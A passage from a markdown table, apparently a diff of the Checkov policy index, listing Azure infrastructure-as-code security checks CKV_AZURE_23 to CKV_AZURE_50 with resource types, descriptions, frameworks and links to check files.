[SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1628 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1629 | 
CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 1630 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1631 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1632 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1633 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1634 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1635 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | 
[SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | +| 1636 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | +| 1637 | CKV_AZURE_24 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | +| 1638 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1639 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1640 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1641 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | arm | 
[SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | +| 1642 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | +| 1643 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) | +| 1644 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | +| 1645 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | +| 1646 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) | +| 1647 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1648 | CKV_AZURE_27 | resource | 
Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1649 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1650 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | +| 1651 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | +| 1652 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) | +| 1653 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1654 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL 
connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1655 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1656 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1657 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1658 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1659 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1660 | CKV_AZURE_30 | resource | configurations | Ensure 
server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1661 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1662 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1663 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) | +| 1664 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1665 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1666 | CKV_AZURE_32 | resource | 
Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1667 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1668 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1669 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1670 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1671 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | 
[StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | +| 1672 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | +| 1673 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) | +| 1674 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1675 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1676 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) | +| 1677 | CKV_AZURE_34 | resource | blobServices/containers | Ensure 
that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1678 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1679 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1680 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1681 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | +| 1682 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1683 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | 
[StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1684 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1685 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | +| 1686 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1687 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1688 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1689 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | 
[MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | +| 1690 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | +| 1691 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) | +| 1692 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | +| 1693 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | +| 1694 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) | +| 1695 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | +| 1696 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom 
subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | +| 1697 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) | +| 1698 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | +| 1699 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | +| 1700 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) | +| 1701 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | +| 1702 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | +| 1703 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | 
[SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) | +| 1704 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | +| 1705 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | +| 1706 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) | +| 1707 | CKV_AZURE_43 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Accounts adhere to the naming rules | arm | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountName.py) | +| 1708 | CKV_AZURE_43 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Accounts adhere to the naming rules | Bicep | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountName.py) | +| 1709 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) | +| 1710 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | +| 1711 | CKV_AZURE_44 
| resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | +| 1712 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) | +| 1713 | CKV_AZURE_45 | resource | Microsoft.Compute/virtualMachines | Ensure that no sensitive credentials are exposed in VM custom_data | arm | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMCredsInCustomData.py) | +| 1714 | CKV_AZURE_45 | resource | Microsoft.Compute/virtualMachines | Ensure that no sensitive credentials are exposed in VM custom_data | Bicep | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMCredsInCustomData.py) | +| 1715 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) | +| 1716 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | +| 1717 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | 
[MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | +| 1718 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) | +| 1719 | CKV_AZURE_48 | resource | Microsoft.DBforMariaDB/servers | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | arm | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py) | +| 1720 | CKV_AZURE_48 | resource | Microsoft.DBforMariaDB/servers | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Bicep | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py) | +| 1721 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) | +| 1722 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | +| 1723 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | +| 1724 | CKV_AZURE_49 | 
resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) | +| 1725 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | +| 1726 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | +| 1727 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1728 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not 